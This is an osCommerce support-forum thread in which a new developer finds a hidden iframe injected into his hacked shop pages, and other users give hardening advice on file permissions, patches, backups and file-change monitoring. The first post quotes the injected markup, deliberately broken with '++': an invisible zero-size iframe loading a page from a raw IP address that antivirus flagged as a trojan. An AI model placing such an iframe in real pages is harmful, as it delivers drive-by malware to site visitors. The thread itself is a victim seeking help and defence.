Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site Hacked! now infecting other machines!


jamiedia

Recommended Posts

Hello,

I have been developing a site for a while. its my first site and there is still a lot to do (any tips/tricks/pointers or advice greatly appreciated) I was working on the site yesterday and I noticed it had been hacked by some iranian people. There was a html file in my images directory and I wasnt happy about it. This didnt cause too much of a problem I deleted it and checked other sitees I have set up through the same hosting and the same had happened on others I have done. Getting a bit worried I researched what had happened and contacted support who told me a problem with Cpanel had left sites vulnerable to attack and they were working on it.

 

I deleted the files only to find that when I went to the category pages mcaffee shouted at me and said something along the lines of "Trojan detected js/exploit-BO.gen" (the name is from memory but its very close) so i went into the source and found a cheeky iframe had been put into the source directly after the opening body. I find this incredibly annoying, partly because it is in development it is not live and the site clearly states that, partly because its a virus and I have had to take it down and partly becuase nobody stands to gain anything. Whats the point? It's just giving an honest guy more work.

 

Since this has happened it seems to have been attacked again(the iframe is now different but with the same outcome). Now the index is also affected, so thats pretty much the entire site.

 

My problem is that I dont know where to look to edit the code. I am new to OSC and I have looked everywhere I can think of. Support said it was a problem with Cpanel but I must be able to remove the malicious source but I dont know where to look.

 

Has anyone else had a problem like this and what should I do to try and combat it. For reference, here is the code leading up the the iframe in the index. Hopefully somebody with a bit more experince will recognise it, I dont even know if the javascript is supposed to be there. I tried removing it but with no luck.

 

(not certain on the forums protocols so cautiously added the ++)

 

<title here>

<!-- start get_javascript(applicationtop2header) //-->

 

<!-- end get_javascript(applicationtop2header) //-->

 

<link rel="stylesheet" type="text/css" href="stylesheet.css">

</head>

<body><i++frame style="visibility: hidden; width:0px; height:0px; border:0px" src="http://72.232.51.10/~weebler/test.html"></++iframe>

<table width="760" border="0" cellspacing="0" cellpadding="0" align="center">

<tr>

<rest of page here>

 

Any help would be greatly appreciated. I dont want to have to start from scratch.

 

Thanks in advance

Link to comment
Share on other sites

The images folder is probably 777 which is why they can upload files to it. It should be 777 ONLY when you actually need it to be, other than that time it should be 755.

 

For the other things you probably don't have the latest fixes installed, they are available from the download section (under the Solutions tab at the top of the forum page). Make sure you files are 644 and directories are 755. NO FILES or DIRECTORIES should be 777.

 

You can also use something like EasyPHP to do your work offline and then upload your finished site. Also the Site Monitor contribution is a wonderful addition that will tell you which files have been added or altered.

Link to comment
Share on other sites

Also, it would be worth stripping any 'OScommerce' and version numbers as this indicates what software you are using and if they were truly malicious would use this info to gain entry.

 

However, your ISP/hosting provider is entirely responsible for this, the servers should have IDS/IPS on them and anti-virus protection. I would also be inclined to check your contract with them and see what security measures they have in place. If it were a live site, then there could have been serious re-precussions!!

 

Think aboout changing your hosting company too. :)

----------------------------------------

Minxy :)

 

"Keep plodding on to achieve your dreams"

Link to comment
Share on other sites

I started my store on SiteGround last week. Did a bunch of work in it and it got hacked already. Someone put in a fake order (still sample data for gosh sake) and deleted my configure.php files.

 

They were marked read-only, too... Not sure how they did that. Also reset some of the items in my database back to original settings. I know it was OK before.

 

I'm new to osC and to MySQL, but I've been using SQL Server for years and I'm a 20-year IT veteran and a 5-year web developer, so I didn't consider myself a total noob, but I don't know as much as I should about securing Unix and PHP/MySQL as I should apparently.

 

$#@%!

Link to comment
Share on other sites

By the way, I note that you said

Getting a bit worried I researched what had happened and contacted support who told me a problem with Cpanel had left sites vulnerable to attack and they were working on it.
but all I got was the same lame response I usually get, that being that my scripts must have been out of date (but I used their installation which I had hoped would be somewhat current.) I learned a lesson today - and thankfully my site is developed on my laptop and only published to SiteGround so I didn't lose everything, and now I get to learn how to Export/Import my database.
Link to comment
Share on other sites

You were right, stupid me set the images folder as 777. I have now changed it to 755 and I am going through the rest to make sure they are all correct and all patches up to date. The sites are hosted with hostgator.com. Ive never had any problem with them oin the past, but this is my first OSC project so I guess I have a lot to learn.

 

I dont understand how the iframe got into the source. Does anyone know? I searched for hours through all the relevant files and I couldnt find it hardcoded anywhere. Which file would it be to write the iframe there?

 

Thanks for the help everyone I was getting a bit worried.

Link to comment
Share on other sites

Also, it would be worth stripping any 'OScommerce' and version numbers as this indicates what software you are using and if they were truly malicious would use this info to gain entry.

 

However, your ISP/hosting provider is entirely responsible for this, the servers should have IDS/IPS on them and anti-virus protection. I would also be inclined to check your contract with them and see what security measures they have in place. If it were a live site, then there could have been serious re-precussions!!

 

Think aboout changing your hosting company too. :)

 

What do I need to edit in order to do this?

Link to comment
Share on other sites

This time bud, make a copy of your site... that way if it happens again you can just re-upload your backup copy and overwrite any changes they might have made...

 

If u use macromedia dreamweaver it keeps a local copy on your PC... as long as you work on the local version and upload to your host it will allways overwrite the files on the host....

Link to comment
Share on other sites

A lot of posts refer to patches.

 

Whenever I visit the download link, I only see where I can download the latest version - is there another page to visit with patches?

 

Thank you for any assistance!

Link to comment
Share on other sites

A lot of posts refer to patches.

 

Whenever I visit the download link, I only see where I can download the latest version - is there another page to visit with patches?

 

Thank you for any assistance!

this file is part of the version you can download. It has all patches in case you want to manually upgrade an older version.

update_20060817.txt

:-)

Monika

 

addicted to writing code ... can't get enough of databases either, LOL!

 

my toolbox: Textpad - Compare and Merge - phpMyAdmin - WS_FTP - Photoshop - How to search the forum

 

Interactive Media Award July 2007 ~ category E-Commerce

my advice on the forum is for free, PMs where you send me work are considered consultation which I charge for ...

Link to comment
Share on other sites

  • 2 weeks later...

OK Thanks for your help everyone, Ive been working on it and got pretty much everything sorted but because I have set the images folders write permissions to 755 I get a warning that says the images directory isnt writeable in the admin. As the owner I thought I would be ok with 755. I have tried to change it but if I set it to 766 none of the images on the site will display, I think this is something to do with the image resize add on I have used but I'm not certain. Does anyone know why this is happening, Have I perhaps set something up wrong? Is it possible that I need to edit a config somewhere? I dont want to put it back to 777 for obvious reasons but I'm not sure what to do about it.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...